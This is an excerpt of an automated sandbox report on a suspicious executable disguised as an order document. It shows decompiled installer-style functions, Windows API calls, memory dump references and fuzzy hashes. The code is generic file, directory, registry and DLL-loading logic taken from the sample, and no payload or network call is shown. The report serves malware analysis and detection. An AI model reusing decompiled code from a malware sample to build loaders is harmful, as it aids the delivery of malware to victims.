                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: 02f0ac1b67cb2627b76fb2ddbe3cc81ab2ed57dd30b63018c57652a54df5b954
                                                • Instruction ID: ed417bde94489f19056025a1bce11d2b054895382ff63e29ca54f2f43ae8860f
                                                • Opcode Fuzzy Hash: 02f0ac1b67cb2627b76fb2ddbe3cc81ab2ed57dd30b63018c57652a54df5b954
                                                • Instruction Fuzzy Hash: AFE048727141049BCB14DBA8DD808AE77A6A784310714843BD502B3660C678DD10CF68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406408(signed int _a4) {
                                                				struct HINSTANCE__* _t5;
                                                				signed int _t10;
                                                
                                                				_t10 = _a4 << 3;
                                                				_t8 =  *(_t10 + 0x40a400);
                                                				_t5 = GetModuleHandleA( *(_t10 + 0x40a400));
                                                				if(_t5 != 0) {
                                                					L2:
                                                					return GetProcAddress(_t5,  *(_t10 + 0x40a404));
                                                				}
                                                				_t5 = E0040639C(_t8); // executed
                                                				if(_t5 == 0) {
                                                					return 0;
                                                				}
                                                				goto L2;
                                                			}

                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004032E9,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040641A
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406435
                                                  • Part of subcall function 0040639C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063B3
                                                  • Part of subcall function 0040639C: wsprintfW.USER32 ref: 004063EE
                                                  • Part of subcall function 0040639C: LoadLibraryW.KERNELBASE(?), ref: 004063FE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                • Instruction ID: 1e5dc79a2ed4663847ded95c08da113472191569ceef3ff13fe49cb738333a03
                                                • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                • Instruction Fuzzy Hash: 67E0863660422056D2105B745E44D3762A89F94700306043EFA42F2041DB789C32AB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: a0400a1b9fb92a3480c647e1a3800c271ea7f123647fdd228604a41f3657c97f
                                                • Instruction ID: b4fe0a8816f2230fb6c640b22720df2591e8103d6b5d86596318fd3cb962ccd0
                                                • Opcode Fuzzy Hash: a0400a1b9fb92a3480c647e1a3800c271ea7f123647fdd228604a41f3657c97f
                                                • Instruction Fuzzy Hash: B9E0C2326005009FCB10AFF5AF4999D3375EF90369710407FE402F10E1CABC9C408A2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E00405C07(WCHAR* _a4, long _a8, long _a12) {
                                                				signed int _t5;
                                                				void* _t6;
                                                
                                                				_t5 = GetFileAttributesW(_a4); // executed
                                                				asm("sbb ecx, ecx");
                                                				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                				return _t6;
                                                			}

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405C0B
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403517,?), ref: 00405C2D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405BE2(WCHAR* _a4) {
                                                				signed char _t3;
                                                				signed char _t7;
                                                
                                                				_t3 = GetFileAttributesW(_a4); // executed
                                                				_t7 = _t3;
                                                				if(_t7 != 0xffffffff) {
                                                					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                				}
                                                				return _t7;
                                                			}

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,004057E7,?,?,00000000,004059BD,?,?,?,?), ref: 00405BE7
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405BFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                • Instruction ID: 2c4e6be97b113ceed9239146329651d13cb313475d1ce615590156906e373da3
                                                • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                • Instruction Fuzzy Hash: 07D01272504520AFC2102738EF0C89BBF55EB543717064B35FAF9A22F0CB314C56DA98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004056DD(WCHAR* _a4) {
                                                				int _t2;
                                                
                                                				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                				if(_t2 == 0) {
                                                					return GetLastError();
                                                				}
                                                				return 0;
                                                			}

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403270,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 004056E3
                                                • GetLastError.KERNEL32 ref: 004056F1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                • Instruction ID: 43b8cc017be4ea794887f60b7ff78796ccb4e437ad0dace2cbd4982aac0f1f36
                                                • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                • Instruction Fuzzy Hash: 02C04C30614602DBD6105B20DE08B177950EB54781F518839614AE11A0DA768455FF2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 70%
                                                			E00401673() {
                                                				int _t7;
                                                				void* _t13;
                                                				void* _t15;
                                                				void* _t20;
                                                
                                                				_t18 = E00402BBF(0xffffffd0);
                                                				_t16 = E00402BBF(0xffffffdf);
                                                				E00402BBF(0x13);
                                                				_t7 = MoveFileW(_t4, _t5); // executed
                                                				if(_t7 == 0) {
                                                					if( *((intOrPtr*)(_t20 - 0x24)) == _t13 || E00406375(_t18) == 0) {
                                                						 *((intOrPtr*)(_t20 - 4)) = 1;
                                                					} else {
                                                						E00405ED3(_t15, _t18, _t16);
                                                						_push(0xffffffe4);
                                                						goto L5;
                                                					}
                                                				} else {
                                                					_push(0xffffffe3);
                                                					L5:
                                                					E00401423();
                                                				}
                                                				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t20 - 4));
                                                				return 0;
                                                			}

                                                APIs
                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 0040168E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: FileMove
                                                • String ID:
                                                • API String ID: 3562171763-0
                                                • Opcode ID: c3778459728d826bbdac694ea121f0bef50cf8d752e3b99a0464db8e1b3f2e90
                                                • Instruction ID: 39a705c871337a298e289750b84dd0ffd285fe21b7fc35a555db8342d30c8454
                                                • Opcode Fuzzy Hash: c3778459728d826bbdac694ea121f0bef50cf8d752e3b99a0464db8e1b3f2e90
                                                • Instruction Fuzzy Hash: 38F0B431604114A7CB10BBBA4F0DD5F32A59B82338B24467BF911F21D5DAFC8A4186AF
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 34%
                                                			E00402786(void* __eflags) {
                                                				long _t7;
                                                				long _t9;
                                                				LONG* _t11;
                                                				void* _t13;
                                                				void* _t15;
                                                				void* _t17;
                                                
                                                				_push(ds);
                                                				if(__eflags != 0) {
                                                					_t7 = E00402BA2(2);
                                                					_t9 = SetFilePointer(E00405F92(_t13, _t15), _t7, _t11,  *(_t17 - 0x20)); // executed
                                                					if( *((intOrPtr*)(_t17 - 0x28)) >= _t11) {
                                                						_push(_t9);
                                                						_push( *((intOrPtr*)(_t17 - 0x10)));
                                                						E00405F79();
                                                					}
                                                				}
                                                				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t17 - 4));
                                                				return 0;
			}

Instruction addresses: 0x00402786 0x00402787 0x00402793 0x004027a0 0x004027a9 0x004029ee 0x004029ef 0x004029f2 0x004029f2 0x004027a9 0x00402a4f 0x00402a5b

                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                  • Part of subcall function 00405F79: wsprintfW.USER32 ref: 00405F86
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: FilePointerwsprintf
                                                • String ID:
                                                • API String ID: 327478801-0
                                                • Opcode ID: e6b1ca666dcbd82e8a1de2ea37f9ef81104a41e8613c43d0bfa43493d1c7e0f2
                                                • Instruction ID: 6e13d26e98101992f91f16a3b10818fa49d07bfc2575382a514d36e2453af549
                                                • Opcode Fuzzy Hash: e6b1ca666dcbd82e8a1de2ea37f9ef81104a41e8613c43d0bfa43493d1c7e0f2
                                                • Instruction Fuzzy Hash: 33E04F71701518AFDB41AFA59E4ACBF776AEB40328B14843BF105F00E1CABD8C119A2E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040172D() {
                                                				long _t5;
                                                				WCHAR* _t8;
                                                				WCHAR* _t12;
                                                				void* _t14;
                                                				long _t17;
                                                
                                                				_t5 = SearchPathW(_t8, E00402BBF(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
                                                				_t17 = _t5;
                                                				if(_t17 == 0) {
                                                					 *((intOrPtr*)(_t14 - 4)) = 1;
                                                					 *_t12 = _t8;
                                                				}
                                                				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t14 - 4));
                                                				return 0;
			}

Instruction addresses: 0x00401741 0x00401747 0x00401749 0x004027ec 0x004027f3 0x004027f3 0x00402a4f 0x00402a5b

                                                APIs
                                                • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401741
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: PathSearch
                                                • String ID:
                                                • API String ID: 2203818243-0
                                                • Opcode ID: 6c3bf02cedd953c02cf191020c70236bab39714c6f7018b829d4b0d23e56155e
                                                • Instruction ID: b70941bc7738bb9b0414a64e3b7b2b1df016234940ef209bc10d8c2c44c885ef
                                                • Opcode Fuzzy Hash: 6c3bf02cedd953c02cf191020c70236bab39714c6f7018b829d4b0d23e56155e
                                                • Instruction Fuzzy Hash: 81E08071300100ABD750CFA4DE49AAA776CDF40378F20417BF515E61D1E6B49A41972D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E00402CC9(void* __eflags, void* _a4) {
                                                				short* _t8;
                                                				intOrPtr _t9;
                                                				signed int _t11;
                                                
                                                				_t8 = E00402BBF(0x22);
                                                				_t9 =  *0x40cdc8; // 0x2effc5c
                                                				_t11 = RegOpenKeyExW(E00402CB4( *((intOrPtr*)(_t9 + 4))), _t8, 0,  *0x7a8af0 | _a4,  &_a4); // executed
                                                				asm("sbb eax, eax");
                                                				return  !( ~_t11) & _a4;
			}

Instruction addresses: 0x00402cdd 0x00402ce3 0x00402cf1 0x00402cf9 0x00402d01

                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,0040232B,00000002), ref: 00402CF1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: 9da2ebaaada2ed444504018bdaab7b440fc23c9bd071d66725cd28ab7958d0a8
                                                • Instruction ID: 818ee9457f1dd57358e842bea021a20957f37b1b048482a93cb04bcf3cfa71ad
                                                • Opcode Fuzzy Hash: 9da2ebaaada2ed444504018bdaab7b440fc23c9bd071d66725cd28ab7958d0a8
                                                • Instruction Fuzzy Hash: DBE08676250108BFDB00DFA8DE47FD537ECAB44700F008021BA08D70D1C774E5408768
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405C8A(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
			}

Instruction addresses: 0x00405c8e 0x00405c9e 0x00405ca6 0x00000000 0x00405cad 0x00000000 0x00405caf

                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403232,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405C9E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                • Instruction ID: 79895e6dacc008681341a1447f190e2469ffe8152373b8c922f561a90a2bf5e3
                                                • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                • Instruction Fuzzy Hash: FCE08C3220921AABEF11AF908C00EEB3B6CFF04360F004832F910E7240D230E8218BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405CB9(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
			}

Instruction addresses: 0x00405cbd 0x00405ccd 0x00405cd5 0x00000000 0x00405cdc 0x00000000 0x00405cde

                                                APIs
                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031E8,00000000,0078B6F8,000000FF,0078B6F8,000000FF,000000FF,00000004,00000000), ref: 00405CCD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                • Instruction ID: 3bcd5730ec7463d7366e74611f21d1d4cfbccb505e455464be6c792c77663440
                                                • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                • Instruction Fuzzy Hash: ABE0EC3225465AABEF109E559C00EEB7B6CFB057A0F044837F915E3150D631E921EBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040159B() {
                                                				int _t5;
                                                				void* _t11;
                                                				int _t14;
                                                
                                                				_t5 = SetFileAttributesW(E00402BBF(0xfffffff0),  *(_t11 - 0x28)); // executed
                                                				_t14 = _t5;
                                                				if(_t14 == 0) {
                                                					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                				}
                                                				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t11 - 4));
                                                				return 0;
                                                			}






                                                Instruction addresses (address column of the disassembly listing; opcode and operand columns were not preserved in this rendering): 0x004015a6 0x004015ac 0x004015ae 0x0040281e 0x0040281e 0x00402a4f 0x00402a5b

                                                APIs
                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 627040d589bdeab8fa2eb58a529c745ef8675100561ec111daf7d71d3d3e8b9e
                                                • Instruction ID: 919d528a87020fadcf7da11d7c25636ac447c6c10cfa6ed71665d8ccb2c3e407
                                                • Opcode Fuzzy Hash: 627040d589bdeab8fa2eb58a529c745ef8675100561ec111daf7d71d3d3e8b9e
